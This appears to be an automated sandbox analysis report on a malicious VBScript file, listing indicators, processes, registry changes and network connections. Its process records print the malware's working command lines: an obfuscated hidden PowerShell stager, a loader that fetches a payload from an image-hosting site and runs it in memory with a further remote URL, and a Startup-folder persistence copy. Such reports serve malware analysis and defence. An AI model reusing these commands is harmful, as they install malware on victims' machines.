download:

ofainsala.vbs

Full analysis: https://app.any.run/tasks/83ef40f0-5a2a-4c09-84f7-ccf6da8288ef
Verdict: Malicious activity
Analysis date: September 26, 2023, 10:36:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5:

DDEC06E82DCB89C40197AB830F825CFD

SHA1:

C2374C8C0C5771D5227F5FA2FF0EA0361FB1FBC4

SHA256:

2532CB332EFC6086C05D5DE55EB02CBEDBB053F10400076A521540542248986B

SSDEEP:

6144:JUxWckjbjVjYjEjzj5jajyRjMjyjIjIj5Kj5jVjDjEjhX/XcXoX1XreXajzuKR:JCWX5F5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 1808)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2660)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2660)

    • Create files in the Startup directory

      • powershell.exe (PID: 2908)

  • SUSPICIOUS

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 2456)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2456)
      • wscript.exe (PID: 3488)

    • Reads the Internet Settings

      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 2660)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2708)
      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 1808)

    • Application launched itself

      • cmd.exe (PID: 2456)
      • powershell.exe (PID: 1808)

    • Powershell version downgrade attack

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2660)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 3488)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 1808)

    • Probably download files using WebClient

      • powershell.exe (PID: 1808)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 2660)

    • Unusual connection from system programs

      • powershell.exe (PID: 2660)

  • INFO

    • Checks supported languages

      • wmpnscfg.exe (PID: 3644)

    • Reads the computer name

      • wmpnscfg.exe (PID: 3644)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 3644)

    • Reads the machine GUID from the registry

      • wmpnscfg.exe (PID: 3644)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (49.9)
.bas | Nevada BASIC tokenized source (25)
.mp3 | MP3 audio (24.9)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs powershell.exe wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1808"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Ng◀▶v◀▶DY◀▶M◀▶◀▶5◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶C4◀▶agBw◀▶Gc◀▶Pw◀▶x◀▶DY◀▶OQ◀▶1◀▶DQ◀▶M◀▶◀▶4◀▶Dk◀▶Mw◀▶3◀▶Cc◀▶Ow◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C◀▶◀▶PQ◀▶g◀▶E4◀▶ZQB3◀▶C0◀▶TwBi◀▶Go◀▶ZQBj◀▶HQ◀▶I◀▶BT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶E4◀▶ZQB0◀▶C4◀▶VwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶Ow◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶B3◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶u◀▶EQ◀▶bwB3◀▶G4◀▶b◀▶Bv◀▶GE◀▶Z◀▶BE◀▶GE◀▶d◀▶Bh◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶KQ◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBF◀▶G4◀▶YwBv◀▶GQ◀▶aQBu◀▶Gc◀▶XQ◀▶6◀▶Do◀▶VQBU◀▶EY◀▶O◀▶◀▶u◀▶Ec◀▶ZQB0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶QgB5◀▶HQ◀▶ZQBz◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶UwBU◀▶EE◀▶UgBU◀▶D4◀▶Pg◀▶n◀▶Ds◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶RQBO◀▶EQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶BP◀▶GY◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶ZQBu◀▶GQ◀▶RgBs◀▶GE◀▶Zw◀▶p◀▶Ds◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶GU◀▶I◀▶◀▶w◀▶C◀▶◀▶LQBh◀▶G4◀▶Z◀▶◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶HQ◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶r◀▶D0◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C4◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶Ow◀▶k◀▶GI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶Ew◀▶ZQBu◀▶Gc◀▶d◀▶Bo◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶UwB1◀▶GI◀▶cwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶L◀▶◀▶g◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶KQ◀▶7◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶EM◀▶bwBu◀▶HY◀▶ZQBy◀▶HQ◀▶XQ◀▶6◀▶Do◀▶RgBy◀▶G8◀▶bQBC◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BT◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶p◀▶Ds◀▶J◀▶Bs◀▶G8◀▶YQBk◀▶GU◀▶Z◀▶BB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FI◀▶ZQBm◀▶Gw◀▶ZQBj◀▶HQ◀▶aQBv◀▶G4◀▶LgBB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶XQ◀▶6◀▶Do◀▶T◀▶Bv◀▶GE◀▶Z◀▶◀▶o◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶u◀▶Ec◀▶ZQB0◀▶FQ◀▶eQBw◀▶GU◀▶K◀▶◀▶n◀▶EY◀▶aQBi◀▶GU◀▶cg◀▶u◀▶Eg◀▶bwBt◀▶GU◀▶Jw◀▶p◀▶Ds◀▶J◀▶Bt◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶HQ◀▶eQBw◀▶GU◀▶LgBH◀▶GU◀▶d◀▶BN◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶o◀▶Cc◀▶VgBB◀▶Ek◀▶Jw◀▶p◀▶C4◀▶SQBu◀▶HY◀▶bwBr◀▶GU◀▶K◀▶◀▶k◀▶G4◀▶dQBs◀▶Gw◀▶L◀▶◀▶g◀▶Fs◀▶bwBi◀▶Go◀▶ZQBj◀▶HQ◀▶WwBd◀▶F0◀▶I◀▶◀▶o◀▶Cc◀▶d◀▶B4◀▶HQ◀▶LgBv◀▶Gk◀▶cwBh◀▶Gs◀▶aQBo◀▶HM◀▶bwBw◀▶C8◀▶Nw◀▶0◀▶DI◀▶Lg◀▶z◀▶DU◀▶Mg◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GQ◀▶ZgBk◀▶GY◀▶Z◀▶◀▶n◀▶C◀▶◀▶L◀▶◀▶g◀▶Cc◀▶Z◀▶Bm◀▶GQ◀▶Zg◀▶n◀▶C◀▶◀▶L◀▶◀▶g◀▶Cc◀▶Z◀▶Bm◀▶GQ◀▶Zg◀▶n◀▶C◀▶◀▶L◀▶◀▶g◀▶Cc◀▶Z◀▶Bh◀▶GQ◀▶cwBh◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶JwBk◀▶GU◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GM◀▶dQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2456"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\admin\AppData\Local\Temp\ofainsala.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "WGLLKwHçRMhWJN".vbs')"C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2660"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.oisakihsop/742.352.651.49//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2708cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\admin\AppData\Local\Temp\ofainsala.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "WGLLKwHçRMhWJN".vbs')"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2724ping 127.0.0.1 -n 5 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
2908powershell -command [System.IO.File]::Copy('C:\Users\admin\AppData\Local\Temp\ofainsala.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "WGLLKwHçRMhWJN".vbs')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3488"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ofainsala.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3644"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
Total events
4 231
Read events
4 058
Write events
170
Delete events
3

Modification events

(PID) Process:(3488) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3488) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3488) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3488) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2908) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1808) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2660) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3644) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{FADC5DEC-4E71-4C75-A920-3672D2932551}\{0223239A-9990-495A-9E39-756BA32DD6F4}
Operation:delete keyName:(default)
Value:
(PID) Process:(3644) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{FADC5DEC-4E71-4C75-A920-3672D2932551}
Operation:delete keyName:(default)
Value:
(PID) Process:(3644) wmpnscfg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{93D954FF-5F57-4C30-89CD-C2885B3965A2}
Operation:delete keyName:(default)
Value:
Executable files
0
Suspicious files
9
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2660powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LH3XFY89OQZY37AS0IHK.tempbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
1808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WGVSQAEBQ38A72RKIERY.tempbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2660powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9764.TMPbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBSSNWGD8AZZ0YTDPON5.tempbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf92c1.TMPbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
1808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9532.TMPbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
1808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2660powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WGLLKwHçRMhWJN.vbstext
MD5:DDEC06E82DCB89C40197AB830F825CFD
SHA256:2532CB332EFC6086C05D5DE55EB02CBEDBB053F10400076A521540542248986B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2660
powershell.exe
188.114.97.3:443
uploaddeimagens.com.br
CLOUDFLARENET
NL
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
2660
powershell.exe
188.114.96.3:443
uploaddeimagens.com.br
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
uploaddeimagens.com.br
  • 188.114.97.3
  • 188.114.96.3
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ofainsala.vbs